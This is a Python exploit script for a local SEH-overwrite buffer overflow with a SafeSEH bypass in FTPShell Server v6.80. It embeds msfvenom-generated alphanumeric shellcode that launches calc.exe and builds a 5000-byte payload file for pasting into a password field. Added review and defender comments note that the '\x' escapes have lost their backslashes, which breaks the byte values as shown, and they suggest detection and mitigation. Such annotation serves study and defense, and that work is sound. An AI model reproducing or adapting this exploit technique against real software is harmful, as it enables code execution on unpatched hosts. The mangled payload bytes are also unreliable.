#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : FTPShell Server v6.80 - Local Buffer Overflow (SafeSEH Bypass) #
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : FTPShell Server v6.80 - Local Buffer Overflow (SafeSEH Bypass) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://www.ftpshell.com/ #
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm #
# Tested on : Windows XP Professional SP3 #
# Steps to reproduce : paste contents of Evil.txt in 'Password' field under configure accounts>Change pass #
#----------------------------------------------------------------------------------------------------------#

'''
Notes:
=====
* All loaded modules including base binary are compiled with /SAFESEH
* Null bytes ('x00') get mangled by the program and end up as spaces ('x20')
'''

#root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b "x00x0ax0d" -f python -v shellcode
#Payload size: 447 bytes
# Payload blob emitted by msfvenom (see the command in the comment above):
# windows/exec running calc.exe, x86/alpha_mixed-encoded so the bytes the
# author lists as bad characters never appear in the output.
# NOTE(review): in this copy every '\x..' escape appears to have lost its
# backslash during extraction, so each "x89" below is three literal ASCII
# characters rather than one byte. The "447 bytes" figure in the comment
# above therefore does not match len(shellcode) as this text stands; treat
# the string as reference data, not as a working byte sequence.
# Defender note: alpha_mixed output is overwhelmingly printable ASCII (the
# runs of x4a/x43 -- 'J'/'C' -- right after the decoder stub are visible
# here), which is a common pattern that IDS/EDR rules for alphanumeric-encoded
# shellcode key on; a long printable-but-non-word run landing in a short
# credential field is the indicator to alert on.
shellcode = ""
shellcode += "x89xe0xd9xedxd9x70xf4x5ax4ax4ax4ax4a"
shellcode += "x4ax4ax4ax4ax4ax4ax4ax43x43x43x43x43"
shellcode += "x43x37x52x59x6ax41x58x50x30x41x30x41"
shellcode += "x6bx41x41x51x32x41x42x32x42x42x30x42"
shellcode += "x42x41x42x58x50x38x41x42x75x4ax49x79"
shellcode += "x6cx7ax48x4cx42x67x70x73x30x57x70x43"
shellcode += "x50x4dx59x4bx55x36x51x59x50x61x74x4e"
shellcode += "x6bx56x30x46x50x6ex6bx61x42x56x6cx6c"
shellcode += "x4bx72x72x32x34x6ex6bx61x62x37x58x76"
shellcode += "x6fx38x37x72x6ax54x66x55x61x4bx4fx4e"
shellcode += "x4cx45x6cx30x61x71x6cx35x52x46x4cx45"
shellcode += "x70x6bx71x58x4fx44x4dx77x71x69x57x7a"
shellcode += "x42x6cx32x63x62x46x37x4ex6bx62x72x62"
shellcode += "x30x6ex6bx53x7ax47x4cx4cx4bx52x6cx74"
shellcode += "x51x52x58x6bx53x62x68x77x71x5ax71x62"
shellcode += "x71x4ex6bx76x39x57x50x36x61x4ax73x6e"
shellcode += "x6bx47x39x56x78x59x73x65x6ax52x69x6e"
shellcode += "x6bx57x44x6cx4bx67x71x4ex36x34x71x6b"
shellcode += "x4fx6ex4cx5ax61x58x4fx74x4dx76x61x4b"
shellcode += "x77x70x38x69x70x52x55x38x76x75x53x51"
shellcode += "x6dx59x68x65x6bx73x4dx65x74x43x45x78"
shellcode += "x64x61x48x6cx4bx36x38x67x54x76x61x49"
shellcode += "x43x73x56x4cx4bx76x6cx50x4bx6ex6bx31"
shellcode += "x48x77x6cx43x31x79x43x6ex6bx43x34x4c"
shellcode += "x4bx53x31x7ax70x4dx59x37x34x66x44x67"
shellcode += "x54x33x6bx53x6bx50x61x30x59x31x4ax63"
shellcode += "x61x69x6fx59x70x71x4fx51x4fx33x6ax6e"
shellcode += "x6bx76x72x6ax4bx6ex6dx33x6dx43x5ax63"
shellcode += "x31x6cx4dx6cx45x4cx72x47x70x45x50x33"
shellcode += "x30x56x30x53x58x74x71x4ex6bx62x4fx4f"
shellcode += "x77x59x6fx6bx65x6fx4bx4cx30x4fx45x6d"
shellcode += "x72x43x66x62x48x39x36x6ax35x6fx4dx4d"
shellcode += "x4dx59x6fx5ax75x47x4cx53x36x63x4cx55"
shellcode += "x5ax4fx70x49x6bx6dx30x31x65x53x35x6d"
shellcode += "x6bx62x67x37x63x30x72x62x4fx32x4ax55"
shellcode += "x50x70x53x79x6fx6ex35x31x73x71x71x30"
shellcode += "x6cx71x73x46x4ex43x55x51x68x35x35x35"
shellcode += "x50x41x41"

# Crafted input exactly as the author laid it out; the offsets and the
# handler address are taken from the original comments, not re-derived.
# Segment order: filler -> nSEH -> SEH -> nop sled -> payload -> padding,
# with the final padding sized so the whole string reaches 5000.
# NOTE(review): as with the payload above, this copy's '\x' escapes appear
# to have lost their backslashes, so 'xcc' is three ASCII characters and
# the arithmetic in the last segment no longer lands on 5000 bytes.
# Defender note: the SEH slot holds the address the author chose
# (0x7ffc0518) to sidestep /SAFESEH on the listed modules; on a hardened
# host SEHOP and DEP+ASLR are the mitigations that close this class of
# overwrite, and a password field receiving thousands of identical bytes
# is the input pattern worth logging and rejecting at the boundary.
buffer = ''.join((
    'xcc' * 2101,                                      # filler up to the nSEH offset
    'xebx06x90x90',                                    # nSEH: short hop over the SEH record
    'x18x05xfcx7f',                                    # SEH: 0x7ffc0518 (pop edi # pop edi # ret)
    'x90' * 10,                                        # nop sled
    shellcode,                                         # calc.exe payload defined above
    'xcc' * (5000 - 2101 - 4 - 4 - 10 - len(shellcode)),  # pad out to 5000
))

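try:
    # Write the crafted input to Evil.txt. A 'with' block closes the handle
    # even if write() raises; the original open()/close() pair left the file
    # open on that path. print(...) with a single argument is valid on both
    # the Python 2 interpreter named in the shebang and Python 3.
    # NOTE(review): mode "w" is text mode; under Python 3 a str payload would
    # be encoded (UTF-8 by default) rather than written byte-for-byte --
    # confirm the interpreter before relying on the on-disk bytes.
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except Exception as e:
    # Best-effort reporting, as in the original: surface the error and exit.
    print(e)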